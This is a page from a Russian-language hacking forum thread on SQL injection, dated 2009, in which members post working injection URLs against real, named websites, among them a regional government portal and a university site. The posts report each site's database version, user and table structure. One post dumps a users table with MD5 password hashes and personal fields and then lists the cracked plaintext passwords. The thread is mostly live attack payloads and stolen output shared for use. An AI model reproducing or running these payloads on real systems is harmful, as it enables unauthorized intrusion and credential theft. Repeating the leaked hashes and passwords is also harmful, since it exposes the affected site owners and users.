ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1085 из 1242 « Первая < 8558598510351075 1081 1082 1083 1084 1085 1086 1087 1088 1089 109511351185 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #10841  
Старый 03.10.2009, 23:05
Аватар для [aciD]
[aciD]
Banned
Регистрация: 30.09.2009
Сообщений: 5
Провел на форуме:
18307

Репутация: 27
По умолчанию
Код:
http://www.webmate.gr/siteadmin/forum/bb_profile.php?mode=view&user=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws%280x3a,user_icq,user_password%29,17,18,19,20,21,22,23,24,25,26+from+users+where+user_icq%3E0+limit+0,1--
 
Ответить с цитированием

  #10842  
Старый 04.10.2009, 13:13
Аватар для Shadrin
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию
Код:
http://www.lomaseutu.fi/majapaikat3.php?id=-114+UNION SELECT 1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),7,8,9,10,11,12,13,14,15
lomaseutufi@10.1.0.8 : lomaseutufi : 5.0.22-log
 
Ответить с цитированием

  #10843  
Старый 04.10.2009, 15:32
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
dealunion.com

Код:
Estimated number of visits for www.dealunion.com
5,383 visits per day
Код:
http://www.dealunion.com/hot.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23
Код:
Database Version: 5.0.81-community-log
Database name: dealunio_cat
User name: dealunio_niyteie@localhost
Код:
Database [dealunio_cat]
    Table [article  ( Rows)]
        id
        title
        tlink
        content
        savetime
        updatetime
        effecttime
        userid
        menuid
        classid
        examined
        saveflag
        click
        location
        typeid
        ihome
        keyword
        listprice
        nowprice
        fs
        x
        y
        compare
        nt
        br
        threadid
        keyid
    Table [banner  ( Rows)]
        id
        logo1
        logo2
        logo3
        typeid
    Table [card_class  ( Rows)]
        id
        name
        sequence
        ihome
        homepage
    Table [card_info  ( Rows)]
        id
        title
        texturl
        imgurl
        content
        sequence
        ihome
        card_class_id
        keyid
        card_issuer_id
        savetime
        userid
        aprlink
        t1
        t2
        t3
        t4
        t5
        t6
    Table [card_issuer  ( Rows)]
        id
        name
        link
        sequence
        flag
    Table [card_key  ( Rows)]
        id
        name
        sequence
    Table [card_mid  ( Rows)]
        card_type_id
        card_info_id
    Table [card_type  ( Rows)]
        id
        name
        description
        sequence
        flag
    Table [class  ( Rows)]
        id
        name
        description
        tname
        menuid
        saveflag
        savetime
        sequence
    Table [click_db  ( Rows)]
        articleid
        flag
        click
    Table [cons  ( Rows)]
        id
        kftitle
        menuid
        flag
        effecttime
        sequence
        savetime
    Table [dept  ( Rows)]
        id
        name
        phone
        contact
        description
        sequence
    Table [every  ( Rows)]
        id
        userid
        manageid
        display
    Table [favor  ( Rows)]
        userid
        folder
    Table [feedback  ( Rows)]
        id
        topic
        title
        content
        email
        name
        savetime
        location
    Table [function  ( Rows)]
        id
        father
        display
        link
        tname
        pwide
        attribute
        sequence
    Table [goodlink  ( Rows)]
        id
        name
        url
        picture
        sequence
        typeid
        linktypeid
        piclink
    Table [guestbook  ( Rows)]
        id
        nickname
        content
        savetime
        location
        titleid
    Table [images  ( Rows)]
        id
        type
        width
        height
        size
        content
        tname
        pointer
        savedate
        sequence
    Table [info  ( Rows)]
        id
        offer
        link
        code
        savetime
        effecttime
        typeid
        ihome
        userid
        view
        click
        typename
    Table [invite  ( Rows)]
        id
        userid
        firstname
        lastname
        email
        savetime
    Table [keywords  ( Rows)]
        id
        title
        flag
        savetime
    Table [linkexg  ( Rows)]
        id
        kftitle
        effecttime
        sequence
        flag
    Table [linktype  ( Rows)]
        id
        typename
        description
        sequence
    Table [manage  ( Rows)]
        id
        roleid
        functionid
        param
        sequence
    Table [menu  ( Rows)]
        id
        father
        child
        display
        url
        grandpa
        level
        view
        tname
        description
        sequence
    Table [model  ( Rows)]
        id
        folder
        preview
    Table [move  ( Rows)]
        id
        typed
        readme
        flag
    Table [newsletter  ( Rows)]
        id
        email
        fname
        lname
        flag
        sendflag
    Table [num  ( Rows)]
        id
        n
    Table [offers  ( Rows)]
        id
        title
        flag
        typeid
        exp
    Table [popedom  ( Rows)]
        id
        tname
        pointer
        wide
        times
        display
    Table [pyeod  ( Rows)]
        id
        testname
        typecode
        saveflag
    Table [randp  ( Rows)]
        roleid
        popedomid
    Table [role  ( Rows)]
        id
        deptid
        name
        savetime
        view
        description
        sequence
    Table [tablename  ( Rows)]
        id
        tname
        display
    Table [titlekeys  ( Rows)]
        id
        name
    Table [top10  ( Rows)]
        id
        content
        saveflag
        typeid
        compare
        savetime
        effecttime
    Table [type  ( Rows)]
        id
        name
        sequence
        ihome
        homepage
        logo
        click
    Table [users  ( Rows)]
        id
        name
        password
        examined
        savetime
        truename
        sex
        phone
        address
        email
        proffesion
        roleid
        deptid
        duty
        sequence
Код:
http://www.dealunion.com/hot.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,id,name,password,examined,savetime,truename,sex,phone,address,email,proffesion,roleid,deptid,duty,sequence),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users%23
Код:
1:tairh:9cecd11561f7c30b77a4637359e5d663:1:2002-02-28 00:00:00:system:0::::soft design:1:0:��վ��������Ա:1
3:zdy:e10adc3949ba59abbe56e057f20f883e:1:2006-07-25 23:44:14:1:6:5:3
4:dhm:e10adc3949ba59abbe56e057f20f883e:1:2006-07-25 23:44:58:0:6:5:4
5:fsp:85964989611934e09fd33690cd7aa279:1:2006-07-25 23:45:39:0:7:7:5
6:wd:96e79218965eb72c92a549dd5a330112:1:2006-07-25 23:46:09:1:6:7:6
7:chz:e10adc3949ba59abbe56e057f20f883e:1:2007-03-05 20:35:28:1:6:5:7
8:lcx:21218cca77804d2ba1922c33e0151105:1:2008-04-05 00:32:35:1:6:5:8
9:lxl:308e5380dd8f3119b02e54b2ef21327c:1:2009-02-27 09:17:29:1:7:7:9
10:ldy:670b14728ad9902aecba32e22fa4f6bd:1:2009-04-16 12:50:14:0:6:5:10
Код:
хэш MD5:9cecd11561f7c30b77a4637359e5d663:пароль_не_найден, хеш уже есть в очереди
хэш MD5:e10adc3949ba59abbe56e057f20f883e:123456
хэш MD5:e10adc3949ba59abbe56e057f20f883e:123456
хэш MD5:85964989611934e09fd33690cd7aa279:beyond
хэш MD5:96e79218965eb72c92a549dd5a330112:111111
хэш MD5:e10adc3949ba59abbe56e057f20f883e:123456
хэш MD5:21218cca77804d2ba1922c33e0151105:888888
хэш MD5:308e5380dd8f3119b02e54b2ef21327c:пароль_не_найден, хеш уже есть в очереди
хэш MD5:670b14728ad9902aecba32e22fa4f6bd:000000
Последний раз редактировалось mailbrush; 04.10.2009 в 15:38..
 
Ответить с цитированием

пыщ пыщ
  #10844  
Старый 04.10.2009, 22:02
Аватар для DeepBlue7
DeepBlue7
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073

Репутация: 44
По умолчанию пыщ пыщ
Код:
http://www.globa.ru/School.asp?ID_Sel=1'
Добрался до

Код:
http://www.globa.ru/School.asp?ID_Sel=1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='fond'+AND+COLUMN_NAME+NOT+IN+('id','rus_name','eng_name','realname','b_loc_date','b_loc_time','b_gmt_date','b_gmt_time','bplace','b_long_min','b_longside','b_long_sec','b_lati_min','b_latiside','b_lati_sec','b_suns','b_moon','b_week','b_ages','s_fade_date','s_fade_time','l_fade_date','l_fade_time','d_date','d_time','dplace','d_info','d_take','d_ages','rate','marriage','children','marrinfo','detail','photoa','photob','natalmap','planet','placid','star','others','body','show','vpos','makedate','zorototems','zorocolors','chinyear','chincolors'))--

Потом забил ))

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Последний раз редактировалось DeepBlue7; 05.10.2009 в 01:04..
 
Ответить с цитированием

ггг
  #10845  
Старый 05.10.2009, 00:25
Аватар для DeepBlue7
DeepBlue7
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073

Репутация: 44
По умолчанию ггг
Код:
http://www.ardiatech.com/main.asp?id_sel=1&cat=news&sCat=news_content&sel_nav1=1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='q_registrants'+AND+COLUMN_NAME+NOT+IN+('reg_id','name','address','tel','email','took_a_shot','successful','date_inserted'))--

Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Последний раз редактировалось DeepBlue7; 05.10.2009 в 01:04..
 
Ответить с цитированием

  #10846  
Старый 05.10.2009, 00:27
Аватар для Swift
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию
Цитата:
http://www.toptrucks.cz/ext/detail.php?PHPSESSID=j5h2rm84vp3g3re3tmbg6fqdq4&ad vert_key=1+and+1=cast((select+version())||chr(58)| |user+as+Int)
PostgreSQL 8.1.11 on i686-pc-linux-gnu, compiled by GCC 2.96:sys_anon
 
Ответить с цитированием

ыыы
  #10847  
Старый 05.10.2009, 01:01
Аватар для DeepBlue7
DeepBlue7
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073

Репутация: 44
По умолчанию ыыы
Администрация Ростовской Области

Код:
http://www.donland.ru/content/info.asp?partId=5&infoId=1+or+1=@@version--
Microsoft SQL Server 2008 (SP1) - 10.0.2723.0 (Intel X86) Jul 10 2009 01:41:08 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2)
Последний раз редактировалось DeepBlue7; 05.10.2009 в 01:04..
 
Ответить с цитированием

  #10848  
Старый 05.10.2009, 01:04
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию
http://www.travellingtight.com/journal.php?id=3/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/LIMIT/**/1,1

Database Version: 5.0.27-Debian_0.dotdeb.1
Database name: travellingtight_main
User name: travellingtight_us3r@localhost
 
Ответить с цитированием

  #10849  
Старый 05.10.2009, 13:26
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию
http://www.sciencesmath-paris.math.jussieu.fr/index.php?page=-16'+union+select+1,2,concat_ws(0x3a,ID_USER,LOGIN_ USER,PASS_USER,NOM_USER,PRENOM_USER,GENRE_USER,MAI L_USER,LVL_USER)+from+FOND_USER+limit+3,1+/*+&lien=14&lang=fr

http://www.sgieurope.com/index.php?RubID=24+union+select+1,2,concat_ws(0x3a 3a,UserLogin,UserPassword),4,5,6,7,8,9,10+from+use r+--+

http://www.fhp.fr/index.php?ID=&LangueID=1&ThemeID=-1+union+select+1,2,3,4,5,6,7,8+from+user+--+&RubID=1

http://surlinjobs.com/showjob.php?jobcode=-2604+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,concat_ws(0x3a3a,id,username,pa ssword),22,23,24,25,26,27,28,29,30,31,32,33,34,35, 36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 +from+admin+limit+6,1+--+
 
Ответить с цитированием

  #10850  
Старый 05.10.2009, 19:09
Аватар для Dyxxx
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928

Репутация: 438
По умолчанию
Gis-t.org pr5
The American Association of State Highway and Transportation Officials sponsors the annual GIS for Transportation Symposium.
Код:
http://www.gis-t.org/poster.php?year=2008+and+substring(version(),1,1)=5+--+
mysql version: 5.0.81-community
mysql user: gistorg_db@localhost
 
Ответить с цитированием
Ответ
Страница 1085 из 1242 « Первая < 8558598510351075 1081 1082 1083 1084 1085 1086 1087 1088 1089 109511351185 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ